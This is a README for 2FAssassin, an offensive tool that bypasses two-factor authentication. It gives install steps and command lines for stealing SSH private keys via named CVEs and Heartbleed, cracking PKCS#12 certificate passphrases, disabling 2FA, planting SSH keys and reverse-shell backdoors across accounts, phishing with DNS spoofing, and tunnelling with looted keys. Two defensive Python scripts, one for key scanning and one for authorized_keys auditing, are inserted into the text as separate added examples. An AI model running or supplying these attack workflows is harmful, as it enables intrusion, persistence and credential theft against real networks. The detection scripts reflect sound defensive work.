## Notes ##
- The latest code will be uploaded by 10th September 2017.
## Preamble ##
- The code changes from time to time; please run `git pull` before running the tool.
## Intro ##
- The effectiveness of two-factor authentication depends on how well a user protects "something only the user has".
- The tool tries to obtain OTPs and private keys using various methods.
- Private keys can be extracted from client certificates and cracked, then used for authentication.
- The tool exploits the common vulnerabilities that cause private key leakage.
- It propagates the compromise from a single machine to entire networks via looted private keys.
## Installing ##
- Install Python on Kali Linux, then run:

```
pip install 2fassassin
cd /root/2fassassin
```

OR

```
git clone https://github.com/maxwellkoh/2FAssassin.git
cd 2fassassin
```
## Features ##

```
root@kali:~/2fassassin# python assassin.py -h
 ___ ___                         _
|_  ) __/_\   ______ __ _ _____(_)_ _
 / /| _/ _ \ (_-<_-</ _` (_-<_-< | ' \+v2
/___|_/_/ \_\/__/__/\__,_/__/__/_|_||_|

usage: assassin.py [-h] [--target TARGET] [--silent] [--scan SCAN]
                   [--check CHECK] [--cert CERT] [--filetype FILETYPE]
                   [--user USER] [--secret SECRET] [--host HOST] [--mode MODE]
                   [--auto AUTO] [--post POST] [--db DB] [--key KEY]
                   [--log LOG]

Bypass 2FA - SMS, Voice, SSH

optional arguments:
  -h, --help           show this help message and exit
  --target TARGET      IP Address
  --silent             reduce output verbosity
  --scan SCAN          Network enumeration { basic | advanced }
  --check CHECK        Check for vulnerabilities, modules
  --cert CERT          Certificate management
  --filetype FILETYPE  Specify file *.extension
  --user USER          username
  --secret SECRET      password
  --host HOST          server ip
  --mode MODE          mode
  --auto AUTO          auto mode for automation
  --post POST          post modules
  --db DB              Manage your trophies.
  --key KEY            keys management
  --log LOG            View logs
root@kali:~/2fassassin#
```
## Example Usage ##
- Network enumeration:

```
./assassin.py --scan <basic | advanced> --target <ip_address | range>
./assassin.py --scan advanced --target 192.168.0.0/24
./assassin.py --scan basic --target 192.168.2.40
```
AUTOMATIC MODE
--------------
* Check everything (common vulnerabilities) that causes private keys to leak out:

```
./assassin.py --check auto --mode attack
```

```
Network Enumeration
         +
         | Building Target Database
         |
         v
+----------------------------------------------------------------------------+
|SSH-based Attacks                                                           |
|ShellShock                                                                  |
|HeartBleed                                                                  |
|Ceragon FibeAir IP-10 SSH Private Key Exposure                              |
|ExaGrid Known SSH Key and Default Password                                  |
|F5 BIG-IP SSH Private Key Exposure                                          |
|Loadbalancer.org Enterprise VA SSH Private Key                              |
|Array Networks vAPV and vxAG Private Key Privilege Escalation Code Execution|
|Quantum DXi V1000 SSH Private Key Exposure                                  |
+-------------------------------------+--------------------------------------+
                                      |
                                      | POST Modules
                                      v
                               Keys Extraction
                                      +
                                      | Looted Keys
                                      |
                                      v
                          Key-based Authentication
```
Manual MODE
-----------
* SSH-based attacks to get private keys:
```
./assassin.py --check ssh --mode attack
```
* HeartBleed attacks to get private keys:
```
./assassin.py --check heartbleed --mode attack
```
* Ceragon FibeAir IP-10 SSH Private Key Exposure: CVE-2015-0936
```
./assassin.py --check ceragon --mode attack
```
* ExaGrid Known SSH Key and Default Password: CVE-2016-1560
```
./assassin.py --check exagrid --mode attack
```
* F5 BIG-IP SSH Private Key Exposure: CVE-2012-1493
```
./assassin.py --check f5 --mode attack
```
* Loadbalancer.org Enterprise VA SSH Private Key
```
./assassin.py --check loadbalancer --mode attack
```
* Array Networks vAPV and vxAG Private Key Privilege Escalation Code Execution
```
./assassin.py --check array --mode attack
```
* Quantum DXi V1000 SSH Private Key Exposure
```
./assassin.py --check quantum --mode attack
```
* Check & disable two-factor authentication:
```
./assassin.py --check config --mode attack
```

POST MODE
---------
* Once you have looted the private keys, perform key-based authentication to all targets in the database:
```
./assassin.py --check ssh --mode auth
```
Certificate Handling
---------------------

Workflow:

1. Analyze the PKCS#12 certificate file.
2. Get the passphrase by cracking or stealing it.
3. Parse the cracked passphrase.
4. Remove the passphrase.
5. Extract the public key.
6. Extract the private key (kept for later use).
7. Validate the domain.
8. Hunt for the real domain (target server).
9. Prepare the client machine and load the client certificate.
10. Authenticate to the SSL server over SSL/HTTPS.

* Look for potential certificate files (they may contain private keys!):
```
./assassin.py --cert analyze --filetype pfx
```
* Cracking PKCS#12 passphrases:
  - Dictionary attack using a wordlist:
```
./assassin.py --cert crack --mode dic --filetype pfx
```
  - Pure brute force + mutation:
```
./assassin.py --cert crack --mode bruteforce --filetype pfx
```
* Dissect the certificate file, remove the passphrase and hunt for the correct domain (target server):
```
./assassin.py --cert dissect --filetype pfx
```
* Prepare the client machine, install the cracked certificate and authenticate to the SSL server:
```
./assassin.py --cert windows --user <username> --secret <password> --host <client_machine_ip>
```
Client-certificate loading flow:

1. The attacker machine (2FAssassin) sends the client certificate and an instruction script to the Windows client (172.16.173.180).
2. The Windows client loads the client certificate.
3. The Windows client authenticates to the remote SSL website (172.16.173.182).
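The Certificate Handling section works because certificate and key files left on disk are what gets collected and cracked. As an added example (not 2FAssassin code), the script below is the defender-side check for the same material: it walks a directory tree, classifies every PEM block, reads the cipher name out of OpenSSH-format keys, and reports keys that are unencrypted, readable by other users, or stored in PKCS#12 containers whose passphrase strength has to be confirmed separately. The sample tree it builds is constructed inline with placeholder key bodies; the file names, the issue strings and the `scan_directory` function are this example's own.

```python
"""Find private key material that is stored unprotected (added example, not 2FAssassin code)."""
import base64
import os
import re
import stat
import struct
import tempfile

# PEM labels that carry private key material. The value says whether the label
# alone implies encryption (only PKCS#8 "ENCRYPTED PRIVATE KEY" does).
PRIVATE_KEY_LABELS = {
    "RSA PRIVATE KEY": False, "EC PRIVATE KEY": False, "DSA PRIVATE KEY": False,
    "PRIVATE KEY": False, "OPENSSH PRIVATE KEY": False, "ENCRYPTED PRIVATE KEY": True,
}
PEM_BLOCK_RE = re.compile(
    r"-----BEGIN (?P<label>[A-Z0-9 ]+)-----\r?\n(?P<body>.*?)-----END (?P=label)-----", re.S)
PKCS12_EXTENSIONS = (".pfx", ".p12")
OPENSSH_MAGIC = b"openssh-key-v1\x00"


def openssh_cipher(body: str) -> str:
    """Return the cipher name from an openssh-key-v1 blob; 'none' means unencrypted."""
    raw = base64.b64decode("".join(body.split()))
    off = len(OPENSSH_MAGIC)
    if not raw.startswith(OPENSSH_MAGIC) or len(raw) < off + 4:
        raise ValueError("not a usable openssh-key-v1 blob")
    (n,) = struct.unpack(">I", raw[off:off + 4])
    return raw[off + 4:off + 4 + n].decode()


def classify_pem(text: str) -> list:
    """Return [(label, encrypted)] for each private-key block in PEM text."""
    found = []
    for m in PEM_BLOCK_RE.finditer(text):
        label, body = m.group("label"), m.group("body")
        if label not in PRIVATE_KEY_LABELS:
            continue  # certificates, CSRs and public keys are not secrets
        encrypted = PRIVATE_KEY_LABELS[label]
        if "Proc-Type: 4,ENCRYPTED" in body:  # legacy OpenSSL PEM encryption header
            encrypted = True
        if label == "OPENSSH PRIVATE KEY":
            encrypted = openssh_cipher(body) != "none"
        found.append((label, encrypted))
    return found


def scan_directory(root: str) -> list:
    """Walk root and return findings as dicts with 'path' and 'issue'."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            is_key_file = False
            if name.lower().endswith(PKCS12_EXTENSIONS):
                is_key_file = True  # binary container: passphrase strength needs a separate check
                findings.append({"path": rel, "issue": "PKCS#12 container: confirm passphrase strength"})
            else:
                with open(full, "r", encoding="utf-8", errors="ignore") as fh:
                    try:
                        blocks = classify_pem(fh.read())
                    except ValueError as exc:
                        blocks = []
                        findings.append({"path": rel, "issue": "unparseable key block: %s" % exc})
                for label, encrypted in blocks:
                    is_key_file = True
                    if not encrypted:
                        findings.append({"path": rel, "issue": "unencrypted private key: " + label})
            mode = stat.S_IMODE(os.stat(full).st_mode)
            if is_key_file and mode & 0o077:  # key material readable beyond its owner
                findings.append({"path": rel, "issue": "group/other readable (mode %o)" % mode})
    return sorted(findings, key=lambda f: (f["path"], f["issue"]))


def build_sample_tree() -> str:
    """Write a constructed sample tree to a temp dir; key bodies are placeholders, not real keys."""
    root = tempfile.mkdtemp(prefix="keyscan-")
    keys = os.path.join(root, "keys")
    os.mkdir(keys)
    openssh_body = base64.b64encode(OPENSSH_MAGIC + struct.pack(">I", 4) + b"none").decode()
    placeholder = "Q09OU1RSVUNURUQ="  # base64 of "CONSTRUCTED"
    samples = {
        "id_rsa_legacy_plain.pem": ("-----BEGIN RSA PRIVATE KEY-----\n%s\n-----END RSA PRIVATE KEY-----\n" % placeholder, 0o600),
        "id_rsa_legacy_enc.pem": ("-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\nDEK-Info: AES-128-CBC,00000000000000000000000000000000\n\n%s\n-----END RSA PRIVATE KEY-----\n" % placeholder, 0o600),
        "pkcs8_enc.pem": ("-----BEGIN ENCRYPTED PRIVATE KEY-----\n%s\n-----END ENCRYPTED PRIVATE KEY-----\n" % placeholder, 0o600),
        "id_ed25519": ("-----BEGIN OPENSSH PRIVATE KEY-----\n%s\n-----END OPENSSH PRIVATE KEY-----\n" % openssh_body, 0o644),
        "server.crt": ("-----BEGIN CERTIFICATE-----\n%s\n-----END CERTIFICATE-----\n" % placeholder, 0o644),
    }
    for name, (content, mode) in samples.items():
        path = os.path.join(keys, name)
        with open(path, "w") as fh:
            fh.write(content)
        os.chmod(path, mode)
    pfx = os.path.join(keys, "client.pfx")
    with open(pfx, "wb") as fh:
        fh.write(b"\x30\x82\x00\x00CONSTRUCTED-PKCS12-PLACEHOLDER")
    os.chmod(pfx, 0o600)
    return root


def scan_sample_tree() -> list:
    return scan_directory(build_sample_tree())


if __name__ == "__main__":
    for f in scan_sample_tree():
        print("%-32s %s" % (f["path"], f["issue"]))
```

On the sample tree this reports the plaintext legacy RSA key, the OpenSSH key with cipher `none` (twice: unencrypted and mode 644), and the PKCS#12 container; the encrypted PEM files and the certificate produce nothing. Point `scan_directory` at home directories or deployment paths to get the same list for real hosts.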
Backdoor
--------

Flow:

1. Create the user `2fassassin`.
2. Generate an RSA keypair (`sshkey`).
3. Access the remote server.
4. Add the keys to every accessible account (account_1, account_2, account_3, account_4, account_5, ...).

* Add arbitrary SSH keys to all the accessible accounts:
```
./assassin.py --check sshkey --mode attack
```
* Drop a persistent backdoor (reverse shell) to all the accessible accounts:
```
./assassin.py --check reverse --mode attack
```
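The Backdoor section adds keys to every account the tool can reach, which means the corresponding detection is an audit of `authorized_keys` files against a list of approved keys. As an added example (not 2FAssassin code), the script below parses each entry the way sshd does (options, key type, blob, comment), checks that the declared key type matches the type encoded inside the blob, computes the SHA256 fingerprint in the `ssh-keygen -l` form, and reports every key whose fingerprint is not on the allowlist. The sample `authorized_keys` content and the 32-byte "public keys" inside it are constructed here and are not real keys; `audit`, `parse_entry` and the finding format are this example's own.

```python
"""Audit OpenSSH authorized_keys entries against an allowlist (added example, not 2FAssassin code)."""
import base64
import hashlib
import re
import struct

# An entry is "[options] key-type base64-blob [comment]". Options may contain
# quoted spaces (command="..."), so the key type is located with a regex
# instead of a plain split().
KEY_TYPES = ("ssh-ed25519", "ssh-rsa", "ecdsa-sha2-nistp256",
             "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521")
ENTRY_RE = re.compile(
    r"(?:^|\s)(" + "|".join(re.escape(t) for t in KEY_TYPES) + r")"
    r"\s+([A-Za-z0-9+/]+={0,2})(?:\s+(.*))?$")


def ssh_string(data: bytes) -> bytes:
    """Encode bytes as an SSH wire-format string (uint32 length prefix)."""
    return struct.pack(">I", len(data)) + data


def fingerprint(blob: bytes) -> str:
    """SHA256 fingerprint in the form `ssh-keygen -lf` prints: unpadded base64."""
    digest = hashlib.sha256(blob).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_entry(line: str):
    """Parse one authorized_keys line; None for blank/comment lines.

    Raises ValueError for undecodable blobs and for entries whose declared
    key type does not match the type encoded inside the blob.
    """
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    m = ENTRY_RE.search(line)
    if not m:
        raise ValueError(f"unparseable entry: {line!r}")
    key_type, blob_b64, comment = m.group(1), m.group(2), m.group(3) or ""
    blob = base64.b64decode(blob_b64, validate=True)  # binascii.Error is a ValueError
    if len(blob) < 4:
        raise ValueError(f"blob too short in entry {comment!r}")
    (type_len,) = struct.unpack(">I", blob[:4])
    if blob[4:4 + type_len] != key_type.encode():
        raise ValueError(f"key type mismatch in entry {comment!r}")
    return {"options": line[:m.start()].strip(), "type": key_type,
            "fingerprint": fingerprint(blob), "comment": comment}


def audit(authorized_keys: str, allowlist: set) -> list:
    """Return one finding per key not on the allowlist and per malformed line."""
    findings = []
    for lineno, line in enumerate(authorized_keys.splitlines(), 1):
        try:
            entry = parse_entry(line)
        except ValueError as exc:
            findings.append({"line": lineno, "reason": str(exc)})
            continue
        if entry and entry["fingerprint"] not in allowlist:
            findings.append({**entry, "line": lineno,
                             "reason": "fingerprint not on allowlist"})
    return findings


# Constructed sample data: 32-byte patterns stand in for Ed25519 public keys.
# They are not real keys and exist only so the example runs offline.
def ed25519_entry(pubkey: bytes, comment: str, options: str = "") -> str:
    blob = ssh_string(b"ssh-ed25519") + ssh_string(pubkey)
    prefix = options + " " if options else ""
    return f"{prefix}ssh-ed25519 {base64.b64encode(blob).decode()} {comment}"


APPROVED = [
    ed25519_entry(bytes(range(32)), "alice@laptop"),
    ed25519_entry(b"\x07" * 32, "bob@backup",
                  options='from="192.0.2.0/24",command="/usr/local/bin/backup --verify"'),
]
APPROVED_FINGERPRINTS = {parse_entry(e)["fingerprint"] for e in APPROVED}

SAMPLE_AUTHORIZED_KEYS = "\n".join(
    ["# ~/.ssh/authorized_keys (constructed sample)"] + APPROVED
    + [ed25519_entry(b"\x42" * 32, "2fassassin")])  # the key the audit should catch


def sample_findings() -> list:
    return audit(SAMPLE_AUTHORIZED_KEYS, APPROVED_FINGERPRINTS)


if __name__ == "__main__":
    for f in sample_findings():
        print(f"line {f['line']}: {f['reason']} ({f.get('comment', '')})")
```

The allowlist is a set of fingerprints rather than whole lines, so an approved key stays approved when its options or comment change, while a key that is merely renamed to look familiar is still flagged. Run `audit` over every `authorized_keys` file sshd consults (including any `AuthorizedKeysFile` paths set in `sshd_config`) and alert on a non-empty result.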
Impersonation / Client Side Attacks
-----------------------------------

Normal path: the Windows client (172.16.173.180) performs client authentication to the SSL website (172.16.173.182).

Attack flow:

1. The server certificate was stolen by the attacker (2FAssassin).
2. The attacker cracked the server certificate, then used it to set up a phishing website (172.16.173.194).
3. DNS spoofing against the DNS server (172.16.173.191).
4. The SSL website now resolves to 172.16.173.194.
5. The client performs client authentication to the phishing website (abnormal).
6. The client downloads malware from the phishing website.
7. The reverse shell connects back to the attacker.

* Set up the phishing website + DNS spoofing attacks:
```
./assassin.py --filetype pfx --spoof <phishing_server_ip> --user <username> --secret <password> --target <victim_ip> --gateway <dns_ip> --mitm <on|off>
```
Tunnelling
-----------
* Create an SSH tunnel using looted private keys (the greater the chain value, the longer the SSH tunnel):
```
./assassin.py --tunnel ssh --chain 1 --user <username> --secret <password> --user2 <username> --host <server_ip>
./assassin.py --tunnel ssh --chain 2 --user <username> --secret <password> --user2 <username2> --host <server_ip> --user3 <username3> --host2 <server_ip2>
./assassin.py --tunnel ssh --chain 3 --user <username> --secret <password> --user2 <username2> --host <server_ip> --user3 <username3> --host2 <server_ip2> --user4 <username4> --host3 <server_ip3>
```
Administration
---------------
* View activity output:
```
./assassin.py --log all
```
* See what you have got (e.g., credentials):
```
./assassin.py --log loot
```
* Find out the origin of an SSH user:
```
./assassin.py --log whereis --user <username>
```
* Find out which SSH accounts are remotely accessible:
```
./assassin.py --log account --host <target_host>
```

Investigation
--------------
* Check whether a remote host uses key-based authentication:
```
./assassin.py --check pka --mode detect
```
* Find out which machine hosts a user account:
```
./assassin.py --log whereis --user <username>
```
* Find out which accounts can potentially be accessed by a specific user:
```
./assassin.py --log account --host <ip_address>
```
## FAQ ##
- Error when launching network enumeration:
  Try loading msgrpc in msfconsole and define the password (e.g., `load msgrpc Pass=abc123`).
- The user "2fassassin" is not found when running `./assassin.py --check sshkey --mode attack`:
  Try creating the user manually:

```
useradd --force-badname 2fassassin
su 2fassassin
cd $HOME
ssh-keygen -t rsa
```
## Limitations ##
- Development Status :: 2 - Pre-Alpha
- Currently still under active development.
## Copyright ##
2FAssassin - Created and maintained by Maxwell Koh

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>.